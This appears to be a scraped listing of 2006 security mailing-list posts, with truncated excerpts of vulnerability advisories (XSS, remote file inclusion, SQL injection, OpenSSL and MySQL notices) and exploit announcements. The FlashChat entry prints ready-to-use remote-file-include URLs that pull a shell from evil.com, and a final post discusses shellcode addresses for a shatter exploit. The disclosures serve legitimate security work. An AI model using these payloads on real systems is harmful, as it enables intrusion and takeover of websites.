SoftBB v0.1 = Cross-Site Scripting

# SoftBB v0.1 = Cross-Site Scripting - XSS Exploit ; # Discovred By : ThE__LeO[Mor0Ccan Islam DefenDers Team] ; # Software : SoftBB ; # Version : 0.1 ; # Site Of Software : Www.Softbb.Be ; # Exploit :

HITBSecConf2006 Final Call !

Hello everybody HITBSecConf2006 - Malaysia is only 13 days away and we will be having loads of speakers down to give talks and presentations on highly interesting topics, so why don't you register now @ http://conference.hitb.org/hitbsecconf2006kl. Come and experience Asia's Largest Security

[USN-339-1] OpenSSL vulnerability

=== Ubuntu Security Notice USN-339-1 September 05, 2006 openssl vulnerability CVE-2006-4339 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10

[USN-338-1] MySQL vulnerabilities

=== Ubuntu Security Notice USN-338-1 September 05, 2006 mysql-dfsg-5.0 vulnerabilities CVE-2006-4031, CVE-2006-4227 === A security issue affects the following Ubuntu releases:

Microsoft Word 0-day Vulnerability (September) FAQ document available

New FAQ document about the recently discovered 0-day vulnerability in Microsoft Word is available. This vulnerability has been reported especially in Office 2000 on Windows 2000 machines. Possible other Office versions are affected as well. This vulnerability is being exploited by Trojan from

[SECURITY] [DSA 1169-1] New MySQL 4.1 packages fix several vulnerabilities

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1169-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze September 5th, 2006

[Kurdish Security # 25 ] GrapAgenda Remote Command Vulnerability

* Kurdish Security Advisory * Original Advisory : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-25-grapagenda-remote.html * Script : GrapAgenda * Site : http://www.graphiks.net * Version : 0.1 * Risk : High * Class : Remote * Contact : [EMAIL PROTECTED] and irc.gigachat.net

SolpotCrew Advisory #7 - AlstraSoft Template Seller Remote File Include Vulnerability

#SolpotCrew Community # #AlstraSoft Template Seller Remote File Include Vulnerability # #Download file : http://www.alstrasoft.com/template.htm #

Re: CuteNews 1.3.* Remote File Include Vulnerability

[EMAIL PROTECTED] wrote: -Description--- $cutepath = __FILE__; $cutepath = preg_replace( '\\\search\.php', , $cutepath); $cutepath = preg_replace( '/search\.php', , $cutepath); require_once($cutepath/inc/functions.inc.php);

[Kurdish Security # 26 ] AnnonceV News Script Remote Command Vulnerability

* Kurdish Security Advisory * Original Adv : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-26-annoncev-news.html * Script : AnnonceV * Site : http://www.comscripts.com/scripts/php.annoncesv.1895.html * Version : 1.1 * Risk : High * Class : Remote * Contact : [EMAIL

ZIXForum 1.12 = RepId Remote SQL Injection

#### ## ©ZIXForum 1.12 = RepId Remote SQL Injection## ## - - - - - - - - - - - - - - - - - - - - - - - - - -

Buffer overflow vulnerability in dsocks

A buffer overflow in variable 'buf' exists due to insufficient validation of variable 'name' in function tor_resolve line 218 of software at http://www.monkey.org/~dugsong/dsocks/

UPDATE: [ GLSA 200509-09 ] Py2Play: Remote execution of arbitrary Python code

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory [UPDATE] GLSA 200509-09:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - -

AuditWizard 6.3.2 gives away administrator password

I found that AuditWizard 6.3.2 by Layton Technologies is leaving the domain administrator password in the logfiles of machines that it audits if you use the Remote Audit feature. I've contacted them but they have yet to produce a fix. They have acknowledged the problem but according to their

Re: VirtualPC 2004 (build 528) detection (?)

Qemu 0.8.2 is also effected by this issue, so the POC code can also be used to detect virtualisation. Nither bochs nor vmware are effected.

FlashChat = 4.5.7 Remote File Include Vulnerability

NeXtMaN mc.nadz [at] gmail.com Here are 2 RFI vulnerabilities in Flashchat i've found: Code: http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt? http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt? video here:

rPSA-2006-0163-1 openssl openssl-scripts

rPath Security Advisory: 2006-0163-1 Published: 2006-09-05 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Unauthorized Access Updated Versions: openssl=/[EMAIL PROTECTED]:devel//1/0.9.7f-10.3-1 openssl-scripts=/[EMAIL

in-link =2.3.4 (adodb-postgres7.inc.php) Remote File Inclusion Exploit

#= #in-link =2.3.4 (adodb-postgres7.inc.php) Remote File Inclusion Exploit # # #Critical Level :

Easy Address Book Web Server Format String Vulnerability

Easy Address Book Web Server Format String Vulnerability Software: Easy Address Book Web Server Version: 1.2 Website: http://www.efssoft.com/ Description: Easy Address Book Web Server is a Web Address Book software that allows users to view, search, add, edit, or administer address books

Dyn CMS = REleased (x_admindir) Remote File Inclusion Exploit

#== #Dyn CMS = REleased (x_admindir) Remote File Inclusion Exploit #=== #

Anti-vir2

By the way i'm using the progress control shatter exploit by brett mooore, but i'm having problem with the setHandler (critical address to overwrite) and shellcodeaddr (data space to inject the code). Probably they are windows dependent. Do you know if there is the possibility to write a